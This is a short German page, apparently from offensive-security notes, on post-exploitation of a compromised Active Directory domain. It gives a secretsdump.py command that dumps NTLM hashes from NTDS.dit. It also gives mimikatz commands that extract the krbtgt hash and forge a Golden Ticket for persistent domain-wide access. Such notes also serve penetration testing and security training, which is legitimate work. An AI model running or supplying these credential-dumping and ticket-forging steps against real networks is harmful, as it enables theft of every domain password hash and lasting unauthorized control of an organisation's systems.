Skip to content

Wenn die Domäne erfolgreich unter Kontrolle gebracht wurde, können noch die Datei Shares nach wertvollen Informationen durchsucht werden. Und die [[AD Begriffe#NTDS.dit|NTDS.dit]] abgegriffen werden um weitere Passwörter zu cracken. Eine weitere Möglichkeit ist für Persistenz zu sorgen, beispielsweise durch erstellen eines Goldenen Tickets oder eines Domänen Admins. Der folgende Befehl holt sich die Hashes aus der [[AD Begriffe#NTDS.dit|NTDS.dit]].

secretsdump.py <DOMAIN>/User:'<PASSWORD>'@<DC IP> -just-dc-ntlm

Golden Tickets

Mit der Übernahme des Kerberos Ticket Granting Ticket(krbtgt) Accounts ist es möglich Tickets für alles zu erstellen. Also ist es möglich Tickets für alle Ressourcen und Maschinen im Netz zu erstellen.

privilege::debug
lsadump::lsa /inject /name:krbtgt
Von diesen Informationen muss die SID genommen werden, welche in der ersten Zeile nach der Domain stehen sollte. Zudem wird der NTLM Hash benötigt.
kerberos::golden /User:<USER MUSS NICHT EXISTIEREN> /domain:<DOMAIN> /sid:<SID> /krbgt:<KRBTGT NTLM HASH> /id:500 /ptt